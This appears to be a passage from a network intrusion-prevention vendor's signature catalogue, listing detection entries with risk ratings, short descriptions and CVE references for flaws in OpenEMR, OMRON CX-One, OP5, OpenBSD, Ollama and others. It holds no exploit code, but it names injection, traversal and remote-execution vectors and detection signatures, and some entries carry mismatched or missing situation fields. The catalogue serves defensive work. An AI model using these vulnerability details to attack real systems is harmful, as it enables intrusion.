About this vulnerability:	An Office document with macros detected
Risk:	Moderate
First detected in:	sgpkg-ips-1119-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Insecure Configuration
Description:	This situation detects Office documents that contain macros.
Situation:	File-OLE_Office-Macro-Document

Office-XML-Macro-Document

About this vulnerability:	An Office XML document with macros detected
Risk:	Moderate
First detected in:	sgpkg-ips-1118-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Insecure Configuration
Description:	This situation detects Office XML documents that contain macros.
Situation:	File-TextId_Office-XML-Macro-Document

Oficla-Malware

About this vulnerability:	Oficla malware
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Oficla is a Windows malware.
Situation:	HTTP_CSH-Oficla-Traffic HTTP_CRL-Oficla-Traffic

OLE-File-In-Text-File

About this vulnerability:	An OLE file found in a text file
Risk:	Moderate
First detected in:	sgpkg-ips-407-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Misconfiguration
Description:	An OLE file was detected inside a text file
Situation:	File-Text_OLE-File-In-Text-File

OLE-Header-In-PDF-File

About this vulnerability:	An OLE file header detected in a PDF file
Risk:	Moderate
First detected in:	sgpkg-ips-416-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Code Injection
Description:	A vulnerability in Microsoft Excel
Situation:	File-PDF_OLE-Header-In-PDF-File

Oleaut32.dll-Remote-Code-Execution-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-417-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

HTTP_SS-Oleaut32.dll-Remote-Code-Execution-Vulnerability
File-Text_Oleaut32.dll-Remote-Code-Execution-Vulnerability

References:

CVE-2011-1995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1995

MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081

Ollama-Getblobspath-Digest-Directory-Traversal

About this vulnerability:

A vulnerability in Ollama Ollama

Risk:

High

First detected in:

sgpkg-ips-1756-5242

Last changed:

sgpkg-ips-1756-5242

Platform:

Generic

Software:

Ollama

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Ollama. The vulnerability is due to improper validation of user data in the digest value when pulling a model. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation, in the worst case, could result in an attacker executing arbitrary code on the target server.

Situation:

File-Text_Ollama-Getblobspath-Digest-Directory-Traversal

References:

CVE-2024-37032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37032

OMI-Agent-Unauthenticated-RCE

About this vulnerability:

An attempt to exploit a vulnerability in Azure OMI Agent detected

Risk:

High

First detected in:

sgpkg-ips-1388-5242

Last changed:

sgpkg-ips-1388-5242

Platform:

Linux

Software:

Open Management Infrastructure

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Azure OMI Agent detected. This situation also covers exploiting of the vulnerability CVE-2021-38648.

Situation:

HTTP_CRL-OMI-Agent-Unauthenticated-RCE

References:

CVE-2021-38647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38647

Omron-Cx-One-Cx-flnet-Node-Name-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in OMRON CX-One

Risk:

Moderate

First detected in:

sgpkg-ips-1060-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Input Validation

Description:

There has been reported a heap-based overflow in OMRON CX-One CX-FLnet module. The value of parameter "Node Name" is insufficiently validated. Exploiting this vulnerability could lead in arbitrary code execution.

Situation:

File-Text_Omron-Cx-One-Cx-flnet-Node-Name-Heap-Based-Buffer-Overflow

References:

CVE-2018-8834
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8834

Omron-CX-One-Cx-flnet-Type-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in OMRON CX-One

Risk:

Moderate

First detected in:

sgpkg-ips-1091-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Buffer Overflow

Description:

Improper input validation when processing the Type parameter of the FLN configuration file causes a heap-based buffer overflow vulnerability in Omron CX-One. A successful exploit may allow an attacker to execute code on the target system.

Situation:

File-Text_Omron-Cx-One-Cx-flnet-Type-Heap-Based-Buffer-Overflow

References:

CVE-2018-8834
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8834

Omron-Cx-One-Cx-flnet-Version-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in OMRON CX-One

Risk:

Moderate

First detected in:

sgpkg-ips-1064-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Input Validation

Description:

Improper input validation when processing the version parameter of the FLN configuration file causes a heap buffer overflow vulnerability in Omron CX-One. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

File-Text_Omron-Cx-One-Cx-flnet-Version-Heap-Buffer-Overflow

References:

CVE-2018-8834
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8834

Omron-Cx-One-Cx-Motion-Sscanf-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in OMRON CX-One

Risk:

Moderate

First detected in:

sgpkg-ips-1088-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Input Validation

Description:

An input validation error when processing the Medi parameter of the MCI configuration file causes a stack-based buffer overflow vulnerability in Omron CX One. A successful exploit may allow an attacker to run arbitrary code on the target system.

Situation:

File-Text_Omron-Cx-One-Cx-Motion-Sscanf-Stack-Based-Buffer-Overflow

References:

CVE-2018-7514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7514

Omron-Cx-One-Cx-Motion-Wcscpy-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in OMRON CX-One

Risk:

Moderate

First detected in:

sgpkg-ips-1089-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Buffer Overflow

Description:

Improper processing of the PLCn and PLCt parameters of the MCI configuration file causes a stack-based buffer overflow vulnerability in Omron CX-One. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

File-Text_Omron-Cx-One-Cx-Motion-Wcscpy-Stack-Based-Buffer-Overflow

References:

CVE-2018-7514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7514

Omron-Cx-One-Cx-Position-Cdmapi32-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in OMRON CX-One CX-Programmer

Risk:

Moderate

First detected in:

sgpkg-ips-1123-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Input Validation

Description:

An input validation error when processing #B_PLC_NAME and #B_PLC parameters of the NCI project file causes a stack-based buffer overflow in Omron CX-One. A successful exploit allows an attacker to execute arbitrary code on the target with the privileges of the target user.

Situation:

File-Text_Omron-Cx-One-Cx-Position-Cdmapi32-Stack-Based-Buffer-Overflow

References:

CVE-2018-18993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18993

Omron-Cx-One-Cx-Position-Nci-File-Comment-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in OMRON CX-One

Risk:

Moderate

First detected in:

sgpkg-ips-1378-5242

Last changed:

sgpkg-ips-1378-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Input Validation

Description:

A stack-based overflow exists in the CX-Position module of OMRON CX-One. The vulnerability is due to input validation error when processing NCI configuration files. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted NCI file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.

Situation:

File-Text_Omron-Cx-One-Cx-Position-Nci-File-Comment-Stack-Buffer-Overflow

References:

CVE-2020-27261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27261

Omron-Cx-One-Cx-programmer-Cdmapi32-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in OMRON CX-One CX-Programmer

Risk:

Moderate

First detected in:

sgpkg-ips-1148-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Input Validation

Description:

There has been reported a stack-based overflow in OMRON CX-One CX-Programmer module. Opening a maliciously crafted configuration file is needed to exploit this vulnerability. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Text_Omron-Cx-One-Cx-programmer-Cdmapi32-Stack-Based-Buffer-Overflow

References:

CVE-2018-18993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18993

Omron-Cx-One-Cx-programmer-Program-Use-After-Free

About this vulnerability:

A vulnerability in OMRON CX-One CX-Programmer

Risk:

High

First detected in:

sgpkg-ips-1166-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Input Validation

Description:

A vulnerability in OMRON CX-One CX-Programmer module which allows remote attackers to execute arbitrary code by enticing a target user into opening a maliciously crafted project, due to an input validation error.

Situation:

File-Text_Omron-Cx-One-Cx-programmer-Program-Use-After-Free

References:

CVE-2019-6556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6556

Omron-Cx-One-Cx-Protocol-Cmessage-Type-Confusion

About this vulnerability:

A vulnerability in OMRON CX-One CX-Protocol

Risk:

Moderate

First detected in:

sgpkg-ips-1165-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Malfunction

Description:

There has been reported a type confusion vulnerability in OMRON CX-One CX-Protocol. This vulnerability could be exploited by opening a maliciously crafted project file. Successful exploitation can lead in arbitrary code execution.

Situation:

File-Binary_Omron-Cx-One-Cx-Protocol-Cmessage-Type-Confusion

References:

CVE-2018-19027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19027

Omron-Cx-One-Cx-Protocol-Cscu-Type-Confusion

About this vulnerability:

A vulnerability in OMRON CX-One CX-Protocol

Risk:

Moderate

First detected in:

sgpkg-ips-1172-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Malfunction

Description:

There has been reported a type confusion vulnerability in OMRON CX-One CX-Protocol. Opening a maliciously crafted project file is required to exploit this vulnerability. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Binary_Omron-Cx-One-Cx-Protocol-Cscu-Type-Confusion

References:

CVE-2018-19027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19027

Omron-Cx-One-Cx-Protocol-Trace-Type-Confusion

About this vulnerability:

A vulnerability in OMRON CX-One CX-Protocol

Risk:

Moderate

First detected in:

sgpkg-ips-1165-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Malfunction

Description:

Improper parsing of a project file by Omron CX One causes a type confusion vulnerability which can be exploited to run arbitrary code on the target system with the privilieges of the exploited process.

Situation:

File-Binary_Omron-Cx-One-Cx-Protocol-Trace-Type-Confusion

References:

CVE-2018-19027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19027

Omron-Cx-One-flnet-Cdmapi32-Wcscpy-CVE-2022-21137-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in OMRON CX-One

Risk:

Moderate

First detected in:

sgpkg-ips-1482-5242

Last changed:

sgpkg-ips-1482-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Buffer Overflow

Description:

Improper validation of the TargetPLS parameted in a configuration file causes a stack-based overflow exists in OMRON CX-One CX-FLnet module. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

File-Text_Omron-Cx-One-flnet-Cdmapi32-Wcscpy-CVE-2022-21137-Stack-Buffer-Overflow

References:

CVE-2022-21137
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21137

Omron-Cx-One-flnet-Cdmapi32-Wcscpy-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in OMRON CX-One

Risk:

Moderate

First detected in:

sgpkg-ips-1105-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Buffer Overflow

Description:

Improper processing of the TargetPLC parameter of the FLN configuration file causes a stack-based buffer overflow vulnerability in OMRON CX-One. A successful exploit may allow an attacker to run arbitrary code on the target system.

Situation:

File-Text_Omron-Cx-One-flnet-Cdmapi32-Wcscpy-Stack-Based-Buffer-Overflow

References:

CVE-2018-7514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7514

Omron-Cx-One-Sba-File-Parsing-Wcscpy-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in OMRON CX-One

Risk:

Moderate

First detected in:

sgpkg-ips-1104-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OMRON CX-One

Type:

Buffer Overflow

Description:

There has been reported a stack-based buffer overflow in OMRON CX-One SwitchBox Utility module. The target user needs to open a maliciously crafted SBA configuration file to get exploited by this vulnerability. Successful exploitation could result in arbitrary code execution.

Situation:

File-Binary_Omron-Cx-One-Sba-File-Parsing-Wcscpy-Stack-Based-Buffer-Overflow

References:

CVE-2018-7514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7514

OneDev-Platform-Attachmentuploadservet-Insecure-Deserialization

About this vulnerability:

A vulnerability in OneDev Platform

Risk:

Moderate

First detected in:

sgpkg-ips-1329-5242

Last changed:

sgpkg-ips-1329-5242

Platform:

Generic

Software:

OneDev Platform

Type:

Input Validation

Description:

There exists an insecure deserialization vulnerability in OneDev Platform. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CSH-OneDev-Platform-Attachmentuploadservet-Insecure-Deserialization

References:

CVE-2021-21242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21242

OneDev-Platform-Pre-Auth-Access-Token-Leak-CVE-2021-21246

About this vulnerability:

An attempt to exploit a vulnerability in OneDev Platform detected

Risk:

High

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

OneDev Platform

Type:

Input Validation

Description:

OneDev is an all-in-one devops platform. In OneDev before version 4.0.3, there are no security checks enforced for the "/users/{id}" endpoint, so it is possible to retrieve arbitrary user details, including their access tokens. This issue was addressed in 4.0.3 by removing user info from API.

Situation:

File-Text_OneDev-Platform-Pre-Auth-Access-Token-Leak-CVE-2021-21246
HTTP_CSH-OneDev-Platform-Pre-Auth-Access-Token-Leak-CVE-2021-21246

References:

CVE-2021-21246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21246

OP5-license.php-Remote-Command-Execution

About this vulnerability:

An OP5 license.php Remote Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

OP5

Type:

Input Validation

Description:

A vulnerability in op5 Monitor, versions before 1.6.2, and op5 Appliance, versions before 5.5.3, in license.php which allows remote attackers to execute arbitrary commands via shell metacharacters in the timestamp parameter for an install action.

Situation:

HTTP_CRL-OP5-license.php-Remote-Command-Execution

References:

CVE-2012-0261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0261

OSVDB-78064
http://www.osvdb.org/78064

OP5-Monitor-Command-Test-Command-Injection

About this vulnerability:	A vulnerability in op5 Monitor
Risk:	Moderate
First detected in:	sgpkg-ips-805-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	OP5
Type:	Input Validation
Description:	A vulnerability in OP5 Monitor
Situation:	HTTP_CSU-OP5-Monitor-Command-Test-Command-Injection

OP5-Welcome-Remote-Command-Execution

About this vulnerability:

An OP5 Welcome Remote Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

OP5

Type:

Input Validation

Description:

A vulnerability in op5 Monitor, versions before 2.0.3, and op5 Appliance, versions before 5.5.3, in op5config/welcome which allows remote attackers to execute arbitrary commands via shell metacharacters in the password parameter.

Situation:

HTTP_CRL-OP5-Welcome Remote-Command-Execution

References:

CVE-2012-0262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0262

OSVDB-78065
http://www.osvdb.org/78065

OPC-Systems-Denial-of-Service

About this vulnerability:	OPCSystems.net version 4.00.0048 and older denial of service
Risk:	High
First detected in:	sgpkg-ips-627-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	OPC Systems
Type:	Malfunction
Description:	A vulnerability in OPCSystemsService.exe that allows an attacker to hang the service by sending a specially crafted tcp packet.
Situation:	Generic_CS-OPC-Systems-Denial-of-Service

Open-Falcon-Plus-Gethostsfromgroup-SQL-Injection

About this vulnerability:

A vulnerability in Open-Falcon Falcon-Plus

Risk:

Moderate

First detected in:

sgpkg-ips-1469-5242

Last changed:

sgpkg-ips-1469-5242

Platform:

Generic

Software:

Open-Falcon Falcon-Plus

Type:

Input Validation

Description:

Lack of sanitation of user input submitted through the /proc/group API endpoint causes an SQL injection vulnerability in Open Falcon Plus. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Open-Falcon-Plus-Gethostsfromgroup-SQL-Injection

References:

CVE-2022-26245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26245

Open-Flash-Chart-Remote-PHP-Code-Execution

About this vulnerability:

An Open Flash Chart Remote PHP Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-723-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Open Flash Chart

Type:

Input Validation

Description:

A vulnerability in Open Flash Chart, v2 Beta 1 and v2, which allows remote attackers to upload and execute arbitrary PHP files through ofc_upload_image.php.

Situation:

HTTP_CSU_Open-Flash-Chart-Remote-PHP-Code-Execution

References:

CVE-2009-4140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4140

BID-37314
http://www.securityfocus.com/bid/37314

OSVDB-59051
http://www.osvdb.org/59051

Open-Web-Analytics-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in Open Web Analytics detected

Risk:

High

First detected in:

sgpkg-ips-1716-5242

Last changed:

sgpkg-ips-1716-5242

Platform:

Generic

Software:

Open Web Analytics

Type:

Input Validation

Description:

A vulnerability in Open Web Analytics, versions before 1.7.4, which allows remote attackers to gain sensitive information and execute arbitrary code by sending crafted requests to the target server, due to files being generated with '<?php (instead of the intended "<?php sequence) which are not handled by the PHP interpreter, and the ability to set a PHP file as error log file in the config settings.

Situation:

HTTP_CRL-Open-Web-Analytics-Remote-Code-Execution

References:

CVE-2022-24637
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24637

OpenAFS-Getstatistics64-RPC-Buffer-Overflow

About this vulnerability:

A vulnerability in OpenAFS.org OpenAFS

Risk:

Moderate

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenAFS

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in OpenAFS, an open source implementation of the Andrew File System. The vulnerability is due to insufficient validation performed on a parameter that's used to allocate memory when processing GetStatistics64 requests. A remote unauthenticated attacker can exploit this vulnerability to send a specially crafted packet to trigger a buffer overflow. Successful attack will result in arbitrary code execution, while an unsuccessful one will lead to a denial of service condition.

Situation:

Generic_UDP-OpenAFS-Getstatistics64-RPC-Buffer-Overflow

References:

CVE-2014-0159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0159

OSVDB-105720
http://www.osvdb.org/105720

OpenBSD-ISAKMP-Multiple-Vulnerabilities

About this vulnerability:

A vulnerability in OpenBSD Project OpenBSD

Risk:

Moderate

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

OpenBSD

Software:

<os>

Type:

Malfunction

Description:

There are multiple vulnerabilities within the ISAKMP daemon that is included in installations of OpenBSD. A remote attacker without credentials can cause, through a steady stream of traffic, a denial of service condition on the remote server. On receiving a malformed packet, the ISAKMP daemon will allocate memory for a chunk of the incoming message (The data that is allocated is dependent on which vulnerability is taking place. See the issues in Section 4 for more details). The ISAKMP daemon, after logging a message to the server log, fails to free the memory described above. If an attacker sends a steady stream of these malformed packets, it is possible to exhaust all free memory on the OpenBSD system, causing a denial of service. All users will be unable to use the remote server until the service is restarted or the server is rebooted.

Situation:

Generic_OpenBSD-ISAKMP-DOS

References:

CVE-2004-0222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0222

BID-10028
http://www.securityfocus.com/bid/10028

OpenBSD-Kernel-ICMPv6-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in OpenBSD Project OpenBSD

Risk:

Moderate

First detected in:

sgpkg-ips-765-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

OpenBSD

Software:

<os>

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in OpenBSD operating system kernel.

Situation:

IPv6_OpenBSD-Kernel-ICMPv6-Handling-Buffer-Overflow

References:

CVE-2007-1365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1365

BID-22901
http://www.securityfocus.com/bid/22901

OpenBSD-TCP-Timeout-Calculation-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenBSD Project OpenBSD

Risk:

Moderate

First detected in:

sgpkg-ips-1245-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

OpenBSD

Software:

<os>

Type:

Malfunction

Description:

There exists a vulnerability in the way the OpenBSD operating system calculates TCP retransmit timeout values. A TCP segment with specially crafted TCP timestamp can cause an error in calculation, creating an unrecoverable system error. An attacker can leverage this vulnerability to completely disable the target system, and all services it provides. In case of a successful attack against this vulnerability, the target kernel will panic, resulting in a complete system-wide denial of service. The following message will be displayed on the system console: panic: timeout_add: to_ticks < 0 Stopped at Debugger+0x4: leave The system must be manually restarted to restore functionality.

Situation:

Generic_TCP-OpenBSD-TCP-Timeout-Calculation-Denial-Of-Service

References:

CVE-2005-0740
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0740

Opencart-Archive-Extraction-Directory-Traversal

About this vulnerability:

A vulnerability in OpenCart

Risk:

Moderate

First detected in:

sgpkg-ips-1759-5242

Last changed:

sgpkg-ips-1759-5242

Platform:

Generic

Software:

OpenCart

Type:

Directory Traversal

Description:

A code injection vulnerability has been reported in OpenCart. This vulnerability is due to improper sanitization of paths during zip extraction. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file writes.

Situation:

File-Zip_Opencart-Archive-Extraction-Directory-Traversal

References:

CVE-2024-21518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21518

OpenCATS-Questionnaire-Doactions-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in OpenCATS

Risk:

Moderate

First detected in:

sgpkg-ips-1578-5242

Last changed:

sgpkg-ips-1578-5242

Platform:

Generic

Software:

OpenCATS

Type:

Input Validation

Description:

Insufficient sanitization of questionnaire values causes a cross-site scripting vulnerability in OpenCATS. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-OpenCATS-Questionnaire-Doactions-Stored-Cross-Site-Scripting

References:

CVE-2023-27293
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27293

OpenDocMan-Cross-Site-Scripting-CVE-2015-5625

About this vulnerability:

OpenDocMan Cross-Site Scripting

Risk:

High

First detected in:

sgpkg-ips-696-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

OpenDocMan

Type:

Cross-site Scripting

Description:

There exists a cross-site scripting vulnerability in OpenDocMan.

Situation:

HTTP_CRL-OpenDocMan-Cross-Site-Scripting-CVE-2015-5625

References:

CVE-2015-5625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5625

BID-76627
http://www.securityfocus.com/bid/76627

Openemr-Admin-Edit_Globals-Application-Title-Stored-XSS

About this vulnerability:

A vulnerability in Openemr Development Team Openemr

Risk:

Moderate

First detected in:

sgpkg-ips-1605-5242

Last changed:

sgpkg-ips-1605-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Input Validation

Description:

Improper input validation for the application title in Admin global config settings causes a cross-site scripting vulnerability in Openemr. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Openemr-Admin-Edit_Globals-Application-Title-Stored-Cross-Site-Scripting-2
HTTP_CRL-Openemr-Admin-Edit_Globals-Application-Title-Stored-Cross-Site-Scripting

References:

CVE-2023-2947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2947

Openemr-Ajax_Download.php-Directory-Traversal

About this vulnerability:

A vulnerability in OpenEMR Development Team OpenEMR

Risk:

High

First detected in:

sgpkg-ips-1189-5242

Last changed:

sgpkg-ips-1641-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Directory Traversal

Description:

A vulnerability in OpenEMR, versions 5.0.1 and prior, which allows remote attackers to read and delete arbitrary files by sending a crafted request, due to the improper validation of the fileName parameter in ajax_download.php.

Situation:

HTTP_CS_Openemr-Backup.php-Command-Injection

References:

CVE-2019-14530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14530

Openemr-Backup.php-Command-Injection

About this vulnerability:

A vulnerability in OpenEMR

Risk:

High

First detected in:

sgpkg-ips-1329-5242

Last changed:

sgpkg-ips-1329-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Input Validation

Description:

There exists a vulberability in OpenEMR, versions before 5.0.2.5, that allows remote attackers to execute arbitrary code due to insufficient sanitation for the user supplied data to backup.php.

Situation:

References:

CVE-2020-36243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36243

Openemr-Calendar-Search-SQL-Injection

About this vulnerability:

A vulnerability in OpenEMR Development Team OpenEMR

Risk:

High

First detected in:

sgpkg-ips-1456-5242

Last changed:

sgpkg-ips-1456-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Input Validation

Description:

An SQL injection vulnerability exists in the OpenEMR. The vulnerability is due to improper validation of user-supplied input when processing the request to /interface/main/calendar/index.php with provider_id POST request parameter. A remote authenticated attacker could exploit this vulnerability by sending crafted HTTP request to target server. Successful exploitation could result in execution of arbitrary SQL statements, which may cause disclosure of sensitive information leading to further compromises.

Situation:

HTTP_CRL-Openemr-Calendar-Search-SQL-Injection

References:

CVE-2021-41843
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41843

Openemr-C_document.class.php-Foreign_Id-Cross-Site-Scripting

About this vulnerability:

A vulnerability in OpenEMR

Risk:

Moderate

First detected in:

sgpkg-ips-1211-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Input Validation

Description:

There exists a cross-site scripting vulnerability in OpenEMR, versions 5.0.1 and earlier, which allows remote attackers to execute remote code on the target users machine due to the lack of validation of user supplied data.

Situation:

HTTP_CRL-Openemr-C_document.class.php-Foreign_Id-Cross-Site-Scripting

References:

CVE-2019-3966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3966

Openemr-C_document.class.php-Patient_Id-Cross-Site-Scripting

About this vulnerability:

A vulnerability in OpenEMR

Risk:

Moderate

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1641-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Input Validation

Description:

There exists a cross-site scripting vulnerability in OpenEMR. Successful exploitation could lead in arbitrary script execution in the target user's browser.

Situation:

HTTP_CSU-Openemr-C_document.class.php-View_Action-Doc_Id-Cross-Site-Scripting

References:

CVE-2019-3963
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3963

Openemr-C_document.class.php-View_Action-Doc_Id-Cross-Site-Scripting

About this vulnerability:

A vulnerability in OpenEMR Development Team OpenEMR

Risk:

Moderate

First detected in:

sgpkg-ips-1198-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Input Validation

Description:

There exists a cross-site scripting vulnerability in OpenEMR. Opening a malicious link is required to exploit this vulnerability. Successful exploitation could lead in arbitrary script code execution on the client side.

Situation:

HTTP_CSU-Openemr-C_document.class.php-View_Action-Doc_Id-Cross-Site-Scripting

References:

CVE-2019-3964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3964

Openemr-C_documentcategory.class.php-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in OpenEMR Development Team OpenEMR

Risk:

High

First detected in:

sgpkg-ips-1457-5242

Last changed:

sgpkg-ips-1457-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in OpenEMR. The vulnerability is due to insufficient sanitization of user input in Document Categories page. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation of this vulnerability could result in arbitrary script execution in the target user's browser.

Situation:

HTTP_CRL-Openemr-C_documentcategory.class.php-Stored-Cross-Site-Scripting

References:

CVE-2022-1178
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1178

Openemr-Download_Template-Directory-Traversal

About this vulnerability:

A vulnerability in OpenEMR Development Team OpenEMR

Risk:

Moderate

First detected in:

sgpkg-ips-1253-5242

Last changed:

sgpkg-ips-1429-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

